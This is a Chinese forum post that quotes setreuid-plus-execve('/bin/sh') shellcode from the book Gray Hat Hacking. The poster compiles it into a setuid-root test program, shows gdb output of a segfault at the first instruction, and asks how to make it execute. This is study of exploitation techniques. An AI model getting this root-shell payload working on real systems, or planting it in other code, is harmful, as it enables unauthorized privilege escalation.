《灰帽黑客(第4版)》,146页,sc2.c, 代码如下:
char sc[]=
"\x31\xc0" //xor %eax,%eax
"\xb0\x46" //mov $0x46,%al
"\x31\xdb" //xor %ebx,%ebx
"\x31\xc9" //xor %ecx,%ecx
"\xcd\x80" //int $0x80
"\x31\xc0" //xor %eax,%eax
"\x50" //push %eax
"\x68\x2f\x2f\x73\x68" //push $0x68732f2f
"\x68\x2f\x62\x69\x6e" //push $0x6e69622f
"\x89\xe3" //mov %esp,%ebx
"\x50" //push %eax
"\x53" //push %ebx
"\x89\xe1" //mov %esp,%ecx
"\x31\xd2" //xor %edx,%edx
"\xb0\x0b" //mov $0xb,%al
"\xcd\x80"; //int $0x80
main()
{
void (*fp) (void);
fp = (void*) sc;
fp();
}
编译语句:
gcc sc2.c -o sc2
sudo chown root sc2
sudo chmod +s sc2
编译结果:
编译是通过了,但执行不了,报错:“段错误 (核心已转储)”。
我gdb sc2,具体如下:
1、反编译 main
(gdb) disass main
Dump of assembler code for function main:
0x080483b4 <+0>: push %ebp
0x080483b5 <+1>: mov %esp,%ebp
0x080483b7 <+3>: and $0xfffffff0,%esp
0x080483ba <+6>: sub $0x10,%esp
0x080483bd <+9>: movl $0x804a040,0xc(%esp)
0x080483c5 <+17>: mov 0xc(%esp),%eax
0x080483c9 <+21>: call *%eax
0x080483cb <+23>: leave
0x080483cc <+24>: ret
End of assembler dump.
2、执行 0x080483c9 <+21>: call *%eax 之前,
1)查看 eax
(gdb) i reg
eax 0x804a040 134520896
.........
2)查看 *(eax) 对应的内容:
0x804a040 <sc>: 0x31 0xc0 0xb0 0x46 0x31 0xdb 0x31 0xc9
0x804a048 <sc+8>: 0xcd 0x80 0x31 0xc0 0x50 0x68 0x2f 0x2f
0x804a050 <sc+16>: 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89
0x804a058 <sc+24>: 0xe3 0x50 0x53 0x89 0xe1 0x31 0xd2 0xb0
0x804a060 <sc+32>: 0x0b 0xcd 0x80 0x00 0x00 0x00 0x00 0x00
3)可见,*(eax)的内容正好是 sc[] 数组里的代码,即一切正常
3、执行 call *(eax),即跳转至 sc[] 并执行里面的第一个指令(就在这里出错),如下:
(gdb) stepi
Program received signal SIGSEGV, Segmentation fault.
0x0804a040 in sc ()
1: x/i $pc
=> 0x804a040 <sc>: xor %eax,%eax
问题:
各位有知道如何让上面代码正常执行的方法吗?
注:
我翻了一下书里,但没看到它对运行环境的要求。我的是 Linux version 3.2.0 ,gcc version 4.6.3
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
